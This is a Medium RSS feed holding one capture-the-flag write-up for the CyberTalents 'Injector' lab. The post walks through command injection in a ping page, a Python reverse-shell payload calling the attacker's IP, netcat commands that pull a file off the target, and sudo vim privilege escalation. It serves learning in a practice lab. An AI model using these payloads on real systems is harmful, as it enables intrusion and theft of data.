<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Pizech on Medium]]></title>
        <description><![CDATA[Stories by Pizech on Medium]]></description>
        <link>https://medium.com/@Pizech?source=rss-165eab145d5a------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*ks05d0sGIo9Zy1JT9zGjdg.jpeg</url>
            <title>Stories by Pizech on Medium</title>
            <link>https://medium.com/@Pizech?source=rss-165eab145d5a------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Fri, 15 May 2026 17:07:43 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@Pizech/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[CyberTalents Injector ]]></title>
            <link>https://medium.com/@Pizech/cybertalents-injector-667b2e50b09a?source=rss-165eab145d5a------2</link>
            <guid isPermaLink="false">https://medium.com/p/667b2e50b09a</guid>
            <dc:creator><![CDATA[Pizech]]></dc:creator>
            <pubDate>Mon, 03 Nov 2025 12:41:33 GMT</pubDate>
            <atom:updated>2025-11-03T12:42:02.772Z</atom:updated>
            <content:encoded><![CDATA[<p>This is my first writeup to share, it is a writeup for Injector challenge on CyberTalents.<br>I have found that I forget how I solved a lot of labs and machines. I looked in my notes I found some commands but I can’t remember what these do or what scenarios should I use them.<br>So, I decided to make full writeups as I can to go for deep understand of what I solve, keep it for me to remember how I solved it, and I will share it so it can help someone or I hope so.<br>Now let’s start:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/804/1*IJpidN4X_j6Vyu3kXMJFvA.png" /></figure><p>Opening the site, didn’t found something interesting, so, I used Gobuster to find hidden paths,</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/680/1*5GIYBF2v0RhvUnmvRdMLAA.png" /></figure><p>Mmm, interesting, now I go to the secret path.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/524/1*kCaKE81CTzKZapcGw2bVzg.png" /></figure><p>Nothing interesting again, but look what it says, “default web page”? let’s try Gobuster again on /secret path.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/733/1*t2W-Ugh5snyLby-sx5RHAw.png" /></figure><p>Nice! let’s go for each path one by one.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/411/1*7M4-jglLnUyQEA6EuFTXIg.png" /></figure><p>In tools I found this, going for ping.php we find:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/420/1*mlZA_uJ4cPRoaMI2_C_MaQ.png" /></figure><p>But how this work? let’s try to type any random IP, and it returns the output of a normal ping.</p><p>Now what to do? wait! what was the challenge name?! “injector”. That’s it, I search for a reverse shell php payload and I have found this:</p><pre>127.0.0.1; python3 -c &#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;Your Ip address&quot;,Your_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#39;</pre><p>Setting netcat listener and injecting the payload and Boom!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/444/1*Brg3yyi8ORSxTpaCyetcUA.png" /></figure><p>I am in your server!</p><p>Browsing in the files and look at this</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/139/1*bEaH1uXxEgRmNJ-yx9SlAw.png" /></figure><p>I want this image in my device to practice some bad tools on it</p><p>I will use netcat for this.</p><p>On my machine: <strong><em>nc -lvp 33170 &gt; out.jpg</em></strong><br>On the attacked device : <strong><em>nc MyIpAddress 33170 &lt; TrollFace.jpg</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/596/1*YNRX-KR-32leSutu3cltKw.png" /></figure><p>Whta is this? anyway, using strings and exiftool, nothing looks useful, but using steghide and:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/317/1*F2TCaOyNFg-Vjwz8dxUbWw.png" /></figure><p>Great! the password in the paswword.txt is D0n41dTrump, mmm, whose password is this?<br>Of course not Donald Trump’s, maybe be it is the password for root, but it didn’t work, let’s see what users else is registered:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/769/1*wm-WNREshrX3DhvPaaB89A.png" /></figure><p>Mmm, who is alex, is it her password? let’s find out</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/254/1*AqB5ReMmQytO_EPNiDd2pQ.png" /></figure><p>But first we need to fix this</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/459/1*8BULixi7nQoREYLFUWyJTg.png" /></figure><p>This spawns an interactive shell so we can continue,</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/198/1*ernQ0hRWL2ICIDJ5hLXz0Q.png" /></figure><p>Yeaaaaahs!</p><p>Can I go to root now? No I can’t sadly, so I need some privilege escalation<br>Running <strong><em>sudo -l</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/784/1*taqNN0qmzeMNTo3hqa6VXg.png" /></figure><p>Good! I can use vim, let’s search on <a href="https://gtfobins.github.io/">GTFOBins</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/879/1*YATkSoT4Dk1Ih6XM1bfXMA.png" /></figure><p>Let’s try this</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/89/1*5_EPxuJYVdxgb4AKPypDyA.png" /></figure><p>Yeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaahs!<br>Easy RCE btw, anyway, going to root and using ls:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/133/1*vbfyT0Ptb2cjeQfYKQ7OMQ.png" /></figure><p>Let’s see what is inside</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/287/1*5lW2qlJsW9nMjyjZjLnxmA.png" /></figure><p>And it is the flag, and GG!</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=667b2e50b09a" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>